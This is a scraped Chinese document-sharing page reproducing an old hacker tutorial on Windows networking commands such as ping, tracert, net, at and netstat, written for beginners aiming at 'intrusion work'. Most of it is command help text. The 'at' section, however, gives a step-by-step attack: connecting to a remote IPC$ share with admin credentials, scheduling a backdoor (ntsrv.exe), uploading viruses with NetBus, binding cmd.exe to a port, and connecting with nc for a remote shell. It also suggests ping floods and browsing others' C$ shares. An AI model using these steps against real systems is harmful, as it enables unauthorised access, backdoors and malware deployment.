版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
XP命令提示符详解及IP查询长,但对网络安全的兴趣却日益高涨,但经过一段时间以来对国内黑客站点的浏览以及部份BBS、留言版上的有关资讯,我发现国内很多新手似乎对网上零星散见的黑客软件极感兴趣,而不重视相关系统知识的积累,我觉得这是一个不好的趋向,所以呢,在这儿把自己相当浅薄的一些经验写出来,希望能够起到抛砖引玉的作用。今天说些什么好呢,对了,再说两句废话吧,“工欲善其事,必先利其器”--当然不是让你再满世界去找新的黑客软件啦(其实我不反对使用这些软件,相反我很喜欢用它们,但是必须是在知其所以然的情况下使用,才有可能对自身的电脑水平有所帮助),要进行入侵工作的话,至少(我认为)得装上NT操作系统,以它作为入侵平台,因为NT本身对网络的支持可以说比WIN9X来得更强大得多……当然,如果想对UNIX系统动点小手术(网络中的UNIX可始终还是主流呀)而又没钱装UNIX的话,LINUX也极佳的选择(特别是现在国内至少有七八种中文LINUX版本一想当年要给REDHAT配上中文支持是何等麻烦……),至少你可以借此了解UNIX系统的基本操作以及文件存放位置、系统配置、编译器、各种动作之后的记录等字串4然后还得再学点编程语言,至少C与UNIX下的SHELL编程得会一点,能看懂人家写的利用各种漏洞的程序,能对它进行修改,偶尔还能写几个小程序放到网上让大伙儿乐乐,这样玩起来才可能有成就感(其实我自己还不太行,但这多少是个目标)好了,废话少说,先讲讲一些M$系统里自带的相关网络程序的使用吧。在忖$的操作系统中,与网络安全较有关系的几个命令/程序是:pingwinipcfgtracertnetatnetstat,且待我慢慢道来:ping:这是TCP/IP协议中最有用的命令之一它给另一个系统发送一系列的数据包,该系统本身又发回一个响应,这条实用程序对查找远程主机很有用,它返回的结果表示是否能到达主机,宿主机发送一个返回数据包需要多长时间。Usage:ping[-t][-a][-ncount][-lsize][-f][-iTTL][-vTOS][-rcount][-scount][[-jhost-list][-khost-list]][-wtimeout]destination-listOptions:tPingtheSpecifedhostuntilinterrupted.(除非人为中止,否则一直Ping下去)aResolveaddressestohostnames.(把IP转为主机名)ncountNumberofechorequeststosend.(响应请求的数量)sizeSendbuffersize.(封包的大小)字串4fSetDon'tFragmentflaginPaCket.(信息包中无碎片)iTTLTimeToLive.(时间)vTOSTypeOfSerViCe.(服务类型)rcountRecordrouteforcounthops.-scountTimestampforcounthops.jhost-listLoosesourceroutealonghost-list.-khost-listStrictsourceroutealonghost-list.(较严格的唉,怎么译好算了,放着吧)-wtimeoutTimeoutinmillisecondstowaitforeachreply.(timeout的时间)比如大家可能都知道的一个命令#ping-f-s65000***.***.***.***或者前阶段大家所谓Ping死霉国佬时所用的命令(当然这样只会造成我方自己的网络阻塞)。其实这个命令主要是用来看对方应答的速度,如果怎么Ping得到的结果都是requesttimeout。那恐怕你根本就不用你去找这台主机了,它不在你的射程之内。winiPcfg:这是用来看自己IP位址的小工具,亚皿98自带,NT里则网络监视器里就能看到IP了,还有个小实用程序叫……好象是叫IPCONFIG吧,没怎么用,都快忘了……这种东东网上其实相当之多,但既然“自带”,又何须外求,何况网上下载的黑客的东东里有没有特洛伊犹未可知,再说了,如果你不是在自己的“爱姬”上运行,岂不是就没法干活,--哈,不好意思,跑题了,但--接着跑两句:可以把一些常用的、经典的工具上传到网上,当作一个备份,什么时候在网吧、某家公司要干活的话,直接下载就是一个完整无缺的工具包了。字串4这个东东相当简单,直接在DOS下键入命令就是了,没有什么参数。tracert:是验证通往远程主机路径的实用程序用法:tracert[-d][-hmaximum_hoPs][-jhost-list][-wtimeout]target_name参数:-dDonotresolveaddressestohostnames.(不将IP转为主机名)-hmaximum_hopsMaximumnumberofhopstosearchfortarget.(最大跟踪数量)-jhost-listLoosesourceroutealonghost-list.-wtimeoutWaittimeoutmillisecondsforeachrePly.(timeout的时间)最简单的用法就是tracerthostname其中hostname是计算机名或你想跟踪其路径的计算机的IP地址。TRACERT将返回数据包借以到达最终目的地的各种IP地址,你知道该怎么利用它吗,我略为解释一下吧:跟踪通往30的路由,最大30:第一行:*&八%&*我就是从这里出去的(呵,真不想说八&八)第四行:是不是快要出国了呢,第九行:呀〜这是日本鬼子的地盘……net:这可是个非常棒的东西,如果不会用的话,赶紧睁大眼睛噢这个命令的语法是:可用的命令包括:NETACCOUNTSNETHELPNETSHARENETCOMPUTERNETHELPMSGNETSTART字串1NETCONFIGNETLOCALGROUPNETSTATISTICSNETCONFIGSERVERNETNAMENETSTOPNETCONFIGWORKSTATIONNETPAUSENETTIMENETCONTINUENETPRINTNETUSENETFILENETSENDNETUSERNETGROUPNETSESSIONNETVIEWNETHELPSERVICES列出用户可以启动的网络服务。NETHELPSYNTAX解释如何阅读NETHELP语法行。NETHELPcommandMORE用于逐屏显示帮助。我可就不逐样解释了--这样会把我的手指累坏,就说说常用的两个命令吧view这个命令的语法是:NETVIEW[∖computername/DOMAIN[:domainname]]NETVIEW/NETWORK:NW[\computername]NETVIEW用于显示一个计算机上共享资源的列表。当不带选项使用本命令时,它就会显示当前域或网络上的计算机上的列表。\computername指用户希望浏览其共享资源的计算机。/DOMAIN:domainname指定用户希望浏览有效的计算机所在的域。如果省略了域名,就会显示局域网络上的所有域。/NETWORK:NW显示NetWare网络上所有可用的服务器。如果指定了一个计算机名,就会显示NetWare网络中那个计算机上的可用资源。至于举例嘛,比如你知道一个远程计算机***.***.**.***上有开资源共享,那么运行字串6netview\***.***.**.***就可以了use这个命令的语法是:NETUSE[devicename*][\computernamesharename[volume][password*]][/USER:[domainname]username][[/DELETE][/PERSISTENT:{YESNO}]]NETUSE[devicename*][password*]][/HOME]NETUSE[/PERSISTENT:{YESNO}]NETUSE用于将计算机与共享的资源相连接,或者切断计算机与共享资源的连接。当不带选项使用本命令时,它会列出计算机的连接。devicename指定一个名字以便与资源相连接,或者指定要切断的设备。有两种类型的设备名:磁盘驱动器(D:至Z:)和打印机(LPT1:至LPT3:)。输入一个星号来代替一个指定的设备名可以分配下一个可用设备名。\computername指控制共享资源的计算机的名字。如果计算机名中包含有空字符,就要将双反斜线(\)和计算机名一起用引号("")括起来。计算机名可以有1到15个字符。sharename指共享资源的网络名字。volume指定一个服务器上的NetWare卷。用户必须安装Netware的客户服务(WindowsNT工作站)或者Netware的网关服务(WindowsNT服务器)并使之与NetWare服务器相连。字串4password指访问共享资源所需要的密码。*进行密码提示。当在密码提示符下输入密码时,密码是不会显示的。/USER指定连接时的一个不同的用户名。domainname指定另外一个域。如果缺省域,就会使用当前登录的域。username指定登录的用户名。/HOME将用户与他们的宿主目录相连。/DELETE取消一个网络连接,并且从永久连接列表中删除该连接。/PERSISTENT控制对永久网络连接的使用。其缺省值是最近使用的设置。YES在连接产生时保存它们,并在下次登录时恢复它们。NO不保存正在产生的连接或后续的连接;现有的连接将在下次登录时被恢复。可以使用/DELETE选项开关来删除永久连接。PS:前两天在绿色兵团的贴子里见到一位仁兄的话,与这个命令有异曲共工之妙,也说明一个大概:在浏览器中输入file:///\***.***.**.***c$则网上共享的C盘内容就会显示出来了,就仿佛用浏览器上FTP站点看到的一样。各位不妨试试,还可试试举一反三……5.at:排定在特定的日期和时间运行某些命令和程序。运行AT命令之前必须先启动Schedule服务。瞧,现炒就得现卖,刚学了net命令,但这个Start命令我可没详述,自己看看帮助文件,摸索一下各种命令的用法吧。字串3C:>netstartscheduleSchedule正在启动服务 Schedulw服务启动成功。AT[\computername][[id][/DELETE]/DELETE[/YES]]AT[\computername]time[/INTERACTIVE][/EVERY:date[,...]/NEXT:date[,...]]"command"\computername指定远程计算机。如果省略这个参数命令会被排定在本机上运行。id指定给排定进度命令的识别号。/delete删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会被删除。/yes用于删除所有作业,且不想在运行删除时显示确认信息。time指定命令运行的时间。/interactive允许作业在运行时,与用户通过桌面交互。/every:date[,...]指定在每周或每月的某日(或某几日)运行命令。如果省略日期,则默认为在每月的本日运行。/next:date[,...]指定在下一个指定日期(如,下周三),运行命令。如果省略日期,则默认为在每月的本日运行。"command"准备运行的WindowsNT命令或批处理文件。知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:利用管理员登陆到目的服务器,方法为:netuse\x.x.x.xipc$“adminpwd"/user:"adminuser”(这里具体方法可参见KILLUSA的文章《HOWTOGETINNT》)利用ntsrv.exe启动远程:netsvc∖x.x.x.xschedule/start3利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后:at\x.x.x.x00:00ntsrv.exe/port:64321其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动口0计口$.0*0,键入目的服务器得ip地址或hostname,连接〜比如第一种方法,你想要在目的服务器运行诸如病毒之类的东东,可以利用netbus得上传功能,将各种“大补丸”上传至目的服务器,再用netbus的〃StartProgram〃,键入完整路径,就。卜了〜第二种方法是利用netbus的“Appredirect”功能,启动远程telnet服务,如下:在netbus中击“Appredirect",键入"C:>winntsystem32cmd.exe",Port为:4321,服务就启动了,然后在本地运行:ncx.x.x.x4321,出现dos启动的画面就表示连接成功:Microsoft(R)WindowsNT(TM)(C)Copyright1985-1996MicrosoftCorp.C:>注:这里有一小段是抄KILLUSA的文章一别找我要稿费啊八&八6.netstat这是一个观察网络连接状态的实用工具。它能检验IP的当前连接状态,在断定你的基本级通信正在进行后,就要验证系统上的服务。这个服务包括检查正在收听输入的通信量和/或验证你正在创建一个与远程站点的会话,它可以很轻松地做到这一点。网上也可以看到很多如X-netstat之类的工具,是WIN界面的,更加直观而已,并没有多什么功能,这个命令的具体用法如下:字串2DisplaysprotocolstatisticsandcurrentTCP/IPnetworkconnections.(显示协议与当前网络连接)NETSTAT[-a][-e][-n][-s][-pproto][-r][interval]aDisplaysallconnectionsandlisteningports.(显示所有连接和监听端口)eDisplaysEthernetstatistics.Thismaybecombinedwiththe-soption.(显示以太连接,可以与-S连用)nDisplaysaddressesandportnumbersinnumericalform.(显示地址和端口)pprotoShowsconnectionsfortheprotocolspecifiedbyproto;protomaybeTCPorUDP.Ifusedwiththe-soptiontodisplayper-protocolstatis
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 中南林业科技大学《Java程序设计实验》2021-2022学年期末试卷
- 中南大学《资源加工学》2022-2023学年第一学期期末试卷
- 农村电商扶贫培训
- 中南大学《文学原理二》2022-2023学年第一学期期末试卷
- 中南大学《探矿工程概论》2022-2023学年第一学期期末试卷
- 中南大学《熔炼与铸造原理与技术》2023-2024学年第一学期期末试卷
- 中南大学《能源与动力过程控制工程》2022-2023学年第一学期期末试卷
- 中南大学《竞技竞赛》2021-2022学年第一学期期末试卷
- 中南大学《回归分析》2022-2023学年第一学期期末试卷
- 《公共关系概论》课件2
- 股骨粗隆间骨折
- 殡仪馆鲜花采购投标方案
- 智能桥梁结构安全监测系统解决方案课件
- 办公楼物业服务管理的培训
- JTG∕T F30-2014 公路水泥混凝土路面施工技术细则
- 帆船知识课件
- 企业宣传片项目进度计划
- 2023-2024学年统部编版九年级道德与法治下册全册知识点总结讲义
- 奇瑞QQ冰淇淋说明书
- 糖尿病性舞蹈病
- EPC项目承包人施工方投资估算与设计方案匹配分析
评论
0/150
提交评论